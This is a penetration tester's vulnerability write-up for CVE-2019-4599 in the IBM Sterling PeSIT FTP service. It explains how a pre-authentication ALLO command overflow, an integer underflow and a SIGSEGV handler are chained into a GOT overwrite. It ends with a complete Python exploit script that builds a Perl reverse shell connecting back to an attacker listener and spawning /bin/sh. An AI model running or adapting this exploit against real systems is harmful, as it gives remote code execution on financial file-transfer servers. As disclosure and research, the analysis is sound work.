A classical penetration test requires skills to assess a large variety of weaknesses, often dealing with common bug classes. Memory corruptions are rarely exploited during penetration tests. The reasons being, they can be risky (you do not want to crash a production system) and it can be time consuming (if you develop/adapt an exploit). It is also rather uncommon to have the opportunity to exploit a known memory corruption bug with a public script because both vendors and users tend to take their patching very seriously. Nevertheless, these kinds of weaknesses may enable attackers to gather powerful primitives, such as Remote Command Execution or secrets theft.
Furthermore, when it comes to the banking world, it is common sense that this kind of issue shall provoke a mighty fuss, especially if no patch is ever available. Nonetheless, being able to detect memory corruptions during security assessments may avoid technical or economic disasters by just decommissioning the vulnerable service.
Finally, let's be honest: legacy software is almost never audited since the major part is decommissioned whenever possible. However, the remaining part is almost never tested. The reason is simple: this kind of software is often very delicate to patch, leading users to avoid losing time in multiple vulnerability assessments. Typically, the first audit will purportedly pinpoint the most evident weaknesses. Memory corruption bugs that do not lead to crash will almost surely not be exploited, whenever detected.
Consequently, I propose you to follow my analysis for CVE-2019-4599. A path I had to cross during a classical penetration test assessment. I was not expecting such surprise at first :)
verif_num()
IBM Sterling PeSIT FTP service is part of a complete transaction environment, aimed at syncing files between large financial entities in order to track, for instance, foreign banks' cash withdrawal. This principle is called teleclearance.
Of course, those files usage - as well as their content - can vary, yet they are all transferred using some exchange protocol in the end. While international standards recommend using SWIFT, French banks have been using a protocol named PeSIT since the 1980s.
Additionally, an FTP server is included in the Connect:Express software suite. It is used as a fallback protocol in case a PeSIT link cannot be established between two French organizations.
Therefore, below are the main points of attacking the FTP server:
The second point is not really relevant since the implementation of FTP protocol does not seem to follow a specification that happens to be critical for the exploitation (RFC 959 p.30/31).
Since the binary is closed source, let's start by disassembling it. Thankfully, the binary is not stripped and most functions are labeled in either French or French/English mix. Looking at the main()
function, we can see that local arguments and flags are handled using getopt()
as shown in the following screenshot:
Like any typical server, the binary starts by listening for incoming TCP connections. Once a connection has been established from a remote peer, the process gets fork()
'ed and receive_commande()
handles TCP payload sent by the client. That is, our main (remote) entry point:
receive_commande()
basically invokes two functions:
TCP_RECV()
: calls recv()
analyse_commande()
: dispatch the FTP command to the appropriate handlerLet's first analyze TCP_RECV()
. Here is a simplified version:
void* TCP_RECV(int mode)
{
int fd;
int cur;
if (mode == 2) {
// load "more data" (e.g. partial file upload)
cur = lit_parm->buf_lg;
fd = sock_dtp;
} else {
[0] cur = 0;
fd = sock_dcp; // incomming connection socket
}
[1] lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
if (lit_parm->buf_lg > 0) {
if (mode == 1) {
if (strf == 2) {
[2] lit_parm->buf_lg -= 2;
} else {
// ...
}
} else {
// ...
}
}
// ...
}
In other words, it fills the following struct lit_parm_t structure:
struct lit_parm_t {
char* buf; // pointer to user supplied data
int buf_lg; // length returned by recv() minus 2
// ...
int max_len; // max buffer length
}
In particular, lit_parm->buf
holds the whole read from the client with recv()
[1], where cur == 0
([0]).
One might notice a very "curious" operation in [2]. Yes, the lit_parm->buf_lg
is decremented by 2. Honestly, I don't know why this statement exists but it actually leads to a bug (more on this later).
lit_parm
itself is a global variable pointing to data allocated on the heap in init() (invoked at start up before fork()
):
void init()
{
// ...
input_net = malloc(130976);
// ...
lit_parm = calloc(1uLL, 32uLL);
lit_parm->buf = input_net;
lit_parm->buf_lg = 130976;
lit_parm->max_len = 130976;
// ...
}
In turn, input_net
is also a global variable pointing to the heap. One might notice, that "130976" looks like a MAX_INPUT_SIZE for the buffer.
Once the data has been received with TCP_RECV()
, receive_commande()
invokes analyse_commande()
which is the main command dispatcher. analyse_commande()
distinguishes two sets of commands:
From an attack surface point of view, we either need to find a vulnerability in the pre-authentication commands or find a post-authentication bypass and then a vulnerability in the post-authentication commands. In the latter case, we would need "two vulnerabilities". That looks like more "work" and having pre-auth bug is sexier!
After a rough look at the different pre-auth commands, the focus has been set on the ALLO command.
The ALLO command (for ALLOcate) is a command that can be called in pre-authentication mode. It is used to allocate a sufficient space prior to a file upload. Typically, the next command shall be STOR for instance.
As the RFC959 stands, the expected grammar is:
ALLO <SP> <decimal-integer>
[<SP> R <SP> <decimal-integer>] <CRLF>
Once data has been received in TCP_RECV()
(hence both lit_parm->buf
and lit_parm->buf_lg
have been filled), the ALLO command handler (invoked from analyze_commande()
) tries to do the following:
rem_file
bufferLet's check the implementation:
int i;
// find the number of characters of "<decimal-integer>" (stop at first space or ends of data)
[0] for (i = 0; lit_parm->buf_lg - 5 > i && lit_parm->buf[5 + i] != ' '; ++i)
{
}
[1] if (verif_num(i, (*lit_parm->buf + 5))) {
if (lit_parm->buf_lg - 5 < i)
copy_len = i - 1;
else
copy_len = i;
[2] memcpy(rem_file, (*lit_parm->buf + 5), copy_len);
rem_file[copy_len] = 0;
// ...
In order to make things simpler, let's call the string located at 5 bytes past lit_parm->buf
: PAYLOAD.
So, the variable i
is set to the length of PAYLOAD in [0]. Then, there is a check that PAYLOAD is only composed of digits with verif_num()
in [1]. Finally, the buffer rem_file
is filled with PAYLOAD of size copy_len
in [2].
One might immediately notice that there is no "length checks" during the memcpy()
in [2]. It is filled with user-controlled data (PAYLOAD) of size copy_len
into rem_file
. The global variable rem_file
itself is stored in the .bss
as a 256 bytes character array.
In other words, passing the following commands leads to a buffer overflow in the .bss:
ALLO 111...<252 times>...111111
^ start overflowing on the next variable in the .bss
At this point, the only "restriction" on PAYLOAD, is that it must only contain digits as enforced by verif_num()
. The latter returns true if PAYLOAD is only composed of digits OR if i
is zero.
This could look like the "big win" here yet "big win" does not equal "quick win" :-).
In fact, being restricted to "digit only" characters leads to harder exploitation. In the next section, we will show how to bypass this restriction and overflow the rem_file
buffer with almost arbitrary data.
verif_num()
In the previous section, we saw that we can trigger a buffer overflow on the .bss
but it came with a limitation: our PAYLOAD was restricted to digit characters.
First, let's have a look at the verif_num()
implementation:
bool verif_num(int ctr, char *test_char)
{
int i;
for (i = 0; i < ctr && isdigit(test_char[i]); ++i)
{
}
return i == ctr;
}
In order to pass the check, the string test_char
must be composed of digits characters up to ctr
characters.
Furthermore, if ctr
is set to zero, verif_num()
will always return true.
Back to the ALLO handler code, we saw that verif_num()
's ctr
parameter was invoked using the i
variables computed here:
for (i = 0; lit_parm->buf_lg - 5 > i && lit_parm->buf[5 + i] != ' '; ++i)
{
}
and called here:
if (verif_num(i, (lit_parm->buf + 5))) {
...
}
Alright, let's analyze this part with some practical data. Here are our test cases:
| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment |
| ----- | ------------- | ---------------- | - | ----------- | -------- | ----------------------- |
| 0 | 'ALLO ' | 5 | 0 | true | 0 | with one space |
| 1 | 'ALLO a' | 6 | 0 | false | n/a | |
| 2 | 'ALLO 1' | 7 | 0 | true | 0 | two spaces before digit |
| 3 | 'ALLO a' | 7 | 0 | true | 0 | two spaces before char |
| 4 | 'ALLO 1' | 6 | 1 | true | 1 | |
| 5 | 'ALLO 1 ' | 7 | 1 | true | 1 | one space after |
| 6 | 'ALLO 12' | 7 | 2 | true | 2 | |
As we can see in case #0, #1, #4, #5 and #6, verif_num()
behaves as expected, as well as the i
value is correctly set. In turn, copy_len
equals i
.
However, looking at case #2 and #3, where two spaces are inserted after the ALLO command, we see that i
is always set to zero, thus verif_num()
also returns true!
That is, we reach the following code:
[0] if (lit_parm->buf_lg - 5 < i)
copy_len = i - 1; // <---- unreachable code ?!
else
copy_len = i;
[1] memcpy(rem_file, lit_parm->buf + 5, copy_len);
Back to the case #3, we see that our payload can be ALLO<sp><sp>a
or ALLO<sp><sp>aaaaaaa...
(two spaces). In other words, by using the "two spaces tricks" we can put some arbitrary data in PAYLOAD.
Alas, in those cases, i
is also set to zero, that is, copy_len
is set to zero! An overflow of 0 bytes cannot be called as such!
Instead, looking back to the line [0] in the previous snippet, it seems that this condition can never be true as lit_parm->buf_lg
has a minimum value of 5... or... does it?
Remember TCP_RECV()
exposed earlier? Yes, there was a "curious line" after the call to recv()
:
lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
// ...
lit_parm->buf_lg -= 2; // <---- what the hell ?!
So yeah, our previous test cases are wrong, let's rewrite them!
Back to the computation of i
, we see that if lit_parm->buf_lg
is lesser than 5
, then i
will always be set to zero (it does not iterate in the for
loop). Hence, verif_num()
always returns true as well!
| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment |
| ----- | ------------- | ---------------- | - | ----------- | ---------- | ----------------------- |
| 0 | 'ALLO ' | 3 | 0 | true | 0xffffffff | with one space |
| 1 | 'ALLO a' | 4 | 0 | true | 0xffffffff | |
| 2 | 'ALLO 1' | 5 | 0 | true | 0xffffffff | two spaces before digit |
| 3 | 'ALLO a' | 5 | 0 | true | 0xffffffff | two spaces before char |
| 4 | 'ALLO 1' | 4 | 0 | true | 0xffffffff | |
| 5 | 'ALLO 1 ' | 5 | 0 | true | 0 | one space after |
| 6 | 'ALLO 12' | 5 | 0 | true | 0 | |
In other words, if our PAYLOAD has size of zero or one character (no matter what), copy_len
is set to 0xffffffff.
This is a INT UNDERFLOW baby, that leads to a huge memcpy()
on the .bss
!
We might benefit from it, yet it rises two issues:
.bss
will certainly crash the processBack to the memcpy()
called in the ALLO command handler, we saw that we can trigger a huge buffer overflow on rem_file
(located in the .bss
section). The code is:
memcpy(rem_file, lit_parm->buf + 5, copy_len);
As a reminder, lit_parm->buf
is set and only set in recv()
, that is, user-controlled data:
lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
One thing to note is that lit_parm->buf
(initialized in init()
before the fork()
) is NEVER RESET between each recv()
call! Let's exploit this behavior to overflow the rem_file
buffer with arbitrary data.
Basically, the exploitation strategy becomes:
lit_parm->buf
lit_parm->buf
and leaves the rest of the buffer untouched.Of course, we can only control the data up to 130971 (130976 - 5) bytes. This is because of the lit_parm->max_len
restriction.
Looking at the memory layout of the process, this will overwrite the whole .bss section before hitting a NULL page and provoke a segfault!
That's one issue solved! There is one more though: how to exploit the fact that the huge overflow (0xffffffff bytes) will provoke a segfault?
Generally, when a buffer overflow bug overwrites a very large portion of contiguous (virtual) memory, there is a "high probability" that it will provoke a page fault (trying to write to non-mapped memory and/or read-only pages). In those cases, the kernel emits a SIGSEGV signal to the process that is generally killed.
However, looking at the init()
function, we see that a lot of various signal handlers are set up:
puts("init: ***** signals caught");
signal(1, 1);
signal(2, sig_fin);
signal(3, sig_fin);
signal(4, sig_fin);
signal(5, 1);
signal(6, sig_fin);
signal(8, sig_fin);
signal(7, sig_fin);
signal(11, sig_fin); // SIGSEGV
signal(31, sig_fin);
signal(13, 1);
signal(14, 1);
signal(15, sig_fin);
signal(20, 1);
signal(17, sig_chld);
signal(21, 1);
signal(22, 1);
signal(29, 1);
signal(10, sig_usr1);
signal(12, sig_usr2);
Therefore, the binary binds a signal handler for the SIGSEGV signal: sig_fin()
. In other words, if our overflow provokes a SIGSEGV during the call to memcpy()
, the execution flow is redirected to sig_fin()
.
As shown above, a signal handler is defined around several signals that are sent to the process upon received signals. Let us see what sig_fin()
, the handler function, does in this crude pseudo-code view:
*(trfpar + 235) = 8000;
if ( strf == 1 )
{
v3 = e_msg_gtrf;
*e_msg_gtrf->gap0 = "01";
v3->gap0[2] = '4';
}
else
{
e_msg_gtrf_ = e_msg_gtrf;
*e_msg_gtrf->gap0 = 14641;
e_msg_gtrf_->gap0[2] = 54;
}
memcpy(e_msg_gtrf->log_buf, trfpar, 1780uLL); // <---- HERE
v5 = *env_monit;
send_tomqueue(*env_monit, *(env_monit + 8));
What we notice here is an explicit call to memcpy()
GLIBC function. The source and destination parameters are global variables that we can overwrite with the huge buffer overflow. e_msg_gtrf->log_buf
would ideally be clobbered to point to the wished write zone, and trfpar
new value should be a pointer to the source data to be copied.
As shown below, the variables we need to overwrite are located after rem_file
, which is good news for us:
We conclude it is possible to control the first two parameters in the memcpy()
call!
Here is a simplified schema of the BSS overwrite right before the Segmentation Fault, hence the call to sig_fin()
Alright, so far we know that we have an arbitrary write ability of 1780 bytes, no less. How can we abuse it to take control over the execution flow? We saw earlier that the shutdown function sig_fin()
was the key for exploiting the service. Nevertheless, it is not unnecessary to mention there is a compelling requirement to succeed in the effort for writing a reliable and fast exploit. Since there is only one chance to control the execution flow before the process ends, the written data must directly lead to command execution if ever possible.
Ideally, we would like to call a function like system()
with a controlled parameter that would allow us to execute a reverse shell (connect-back). Alas, system()
is not imported by the binary.
Instead, looking at various imported symbols, we figured out that only execl()
was available. As a reminder, it has the following signature:
int execl(const char *path, const char *arg, ...);
More parameters have to be under our control. Four, to spawn a remote shell... We will have to troubleshoot this issue. In the binary, execl()
is only invoked in the r_exit()
function, which is called by the "parent process" during program exit.
We have no choice but find a way to have execl()
called with controlled parameters.
One major pitfall is the copy size (0x6f4 = 1780 bytes) of the write-what-where since it is a hardcoded value. Exploit writers may aim to avoid unpleasant behaviors from the process by trying to only overwrite one of the last addresses in the .got
section.
Fortunately for us - and since fork()
is called upon every incoming connection -, a crash will not disrupt the parent service so we can let the process crash after we obtain the mighty shell.
Before exploiting for real, let's check the enabled protections for this binary:
Complete memory randomizing and Read-Only RElocations are not enabled at all. As predicted, that makes the Global Offset Table an ideal victim for a good old control flow hijacking, and since the .bss
section is mostly under our control, we may use it to store payloads. All we have to do is to overwrite the .got
entry of a GLIBC function that is called right after the arbitrary copy, with a known and controlled location address. Easy peasy!
As said earlier, it is safer to overwrite the least entries as possible, to reduce the chances to have the program crash or behave badly. Overwriting the last values facilitates this.
Maybe following the good segfault handler function code could help whilst confronting it to .got
candidates. What about send_tom_queue()
, which is issued right after the memcpy()
call?
memcpy(e_msg_gtrf->log_buf, trfpar, 1780uLL);
v5 = *env_monit;
send_tomqueue(*env_monit, *(env_monit + 8));
time()
appears to be a viable candidate since it is among the first running functions after send_tom_queue()
is invoked by sig_fin()
. It would enable fast execution flow preemption. Unfortunately time()
does not carry any parameter; using it directly may undermine the exploit reliability.
However, we should keep in mind that most of the .bss
is under our control, and that the software is a state machine that pushes and pulls data variables that are defined globally. The only requirement is to have controlled buffer pointers in the function parameters dedicated registers (RDI, RSI, RDX etc.).
After a quick review, one function looks rather handy and adequate: TCP_SEND()
.
As shown above env_param
and sock_dcp
are used here by send()
, which is among the latter parts of the Global Offset Table entries. Luckily, this parameter lies at 0x644778
whereas rem_file
, the buffer that we initially overflowed in .bss
, lies at 0x63AF60
. This means env_param
can be overwritten 38936 bytes ahead of the beginning of our buffer.
Also, to avoid losing the flow or undergoing unexpected crashes, we need to neutralize .got
entries that are placed after send()
with addresses to ret
assembly instruction. This will make any unexpected call to imported functions do nothing and go back to our normal flow.
To sum it up, [email protected]
should be clobbered to point to TCP_SEND()
, who calls send(controlled_param1, controlled_param2, controlled_param3)
, and [email protected]
could be rewritten, therefore calling send()
would instead result in calling [email protected]
. This function is imported from GLIBC as per a program function called r_exit()
.
The final call should be as such:
execl("/bin/sh", "/bin/sh" "-c", "echo win")
^- path ^- argv[0] ^- argv[1] ^- argv[2]
Hang on chingón...
Only three parameters are controlled when issuing a call to send()
. So far, there is no real need to look for another function call ensuring a total control of parameters, to obtain command execution. Indeed this constraint occurs in Bash since it interprets text between quotes as distinct arguments... whereas other language interpreters won't.
Thus, using python -c
or perl -e
without quotes should work since execl()
is not using shell to spawn executable files.
The command execution could then be achieved by using:
execl("/usr/bin/perl", "/usr/bin/perl", "-e[CMD]")
Due to its lack of binary protections, it was possible to exploit this software during a penetration test assignment. A properly mitigated binary would have forced us to find another bug for leaking memory addresses, or poison the .bss
section much more delicately. It requires another technique to achieve code execution since the Global Offset Table would be in Read Only mode. For instance, since new client sessions are fork()
'ed into a new process that has its memory segments at the same place as the parent.
So one could find the base address by attempting to write at many places and track crashes. Once the randomization is defeated, several techniques - such as overwriting __exit_funcs
- lead to execution flow hijacking. It is however probable that a more complex payload execution technique, such as stack pivot + ROP, would be required.
A few other memory corruption bugs might still be exploitable depending on the context, since this kind of application is almost never audited by external researchers. Plus, since the exploit was written during a penetration testing assessment, the provided solution might not be the best one due to time requirements.
Note: A patch was issued to remediate the issue a few months ago. Is it convincing? Maybe :)
Exploit code using python2 pwntools (sorry!)
#!/usr/bin/env python2
# IBM Sterling CX FTP Service
# Version: v1.5.0.12
# cve: CVE-2019-4599
# Proof-of-Concept state
# python ftp_pesit_exploit.py -r <target_ip> -p <PORT> -l <listener_ip>
import sys, time
from optparse import OptionParser
from pwn import options, remote, listen, randoms, log, p64
parser = OptionParser()
parser.add_option("-l", "--local-addr", dest="localip",
help="Local address for connect back", metavar="LOCALADDR",
default="127.0.0.1")
parser.add_option("-Y", "--local-port", dest="localport",
help="Local port for connect back", metavar="LOCALPORT",
default="4444")
parser.add_option("-r", "--remote-addr", dest="remoteip",
help="Remote target address", metavar="REMOTEADDR",
default=None)
parser.add_option("-p", "--remote-port", dest="remoteport",
help="Remote target port", metavar="REMOTEPORT",
default=5003)
(options, args) = parser.parse_args()
if __name__ == '__main__':
if (options.remoteip is None):
log.failure("Please specify a target address and port.")
sys.exit(1)
lport = options.localport
raddr = options.remoteip
lip = options.localip
bc = listen(lport)
conn = remote(raddr, options.remoteport)
revshell = 'use Socket;$i="'
revshell += lip
revshell += '";$p='
revshell += str(lport)
revshell += ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if('
revshell += 'connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");'
revshell += 'open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
cmd = "-eeval{" + revshell + "}"
cmd += "\x00"
bin = '/usr/bin/perl'
conn.readuntil(')')
payload = ""
payload += p64(0xB16B00B54DADD135)
payload += bin
payload += '\x00' * (16 - len(bin))
# .bss base: 0x633940
payload += p64(0) # Clean beginning
payload += p64(0x62f5d8) # &[email protected]
payload += p64(0x63af68) # execl argv[0]
payload += p64(0x63afa0) # execl argv[1]
payload += p64(0x0)
payload += cmd
payload += randoms(840 - len(cmd))
payload += p64(0x63b2f0) # sig_fin() memcpy() source (for .got overwrite)
got = ""
got += p64(0x406d40) # overwriting send() w/ &execl@plt
got += p64(0x400534) * 29 # ret
got += p64(0x41393e) # overwriting time() w/ &TCP_SEND()
got += p64(0x400534) * 3 # ret
payload += got
payload += randoms(1792)
payload += p64(0x63af70) # filename
payload += randoms(356)
payload += p64(0x63af68) # &ptr to binary to launch
payload += randoms(4436)
payload += p64(0x6339F8) # -> FILE *struct (to fake struct)
payload += randoms(520)
payload += p64(0x63af78) # @ of (rem_file+24) (ARGV0)
payload += randoms(248)
payload += p64(0x63afa0) # ptr to shell cmd string (ARGV2)
payload += randoms(30360)
payload += p64(0x63af88) # sig_fin() memcpy dst
payload += randoms(8696)
# conn.sendline('USER LEXFO')
# conn.readuntil('please?')
# Overwrite `.bss`
conn.sendline(randoms(5) + payload) # WARNING: sendline() adds an extra '\n'
log.success('Filled lit_parm->buf with good values.')
conn.readuntil(')')
# conn.clean()
# Triggering SIGSEGV (handler!) for arbitrary write primitive
log.info(
'Making subprocess crash to obtain sig_fin() poison .bss and preempt normal flow.'
)
conn.send('ALLO 1')
bc.wait_for_connection()
conn.clean()
conn.close()
time.sleep(1)
log.success('Got shell! Enj0y')
bc.interactive()
bc.close()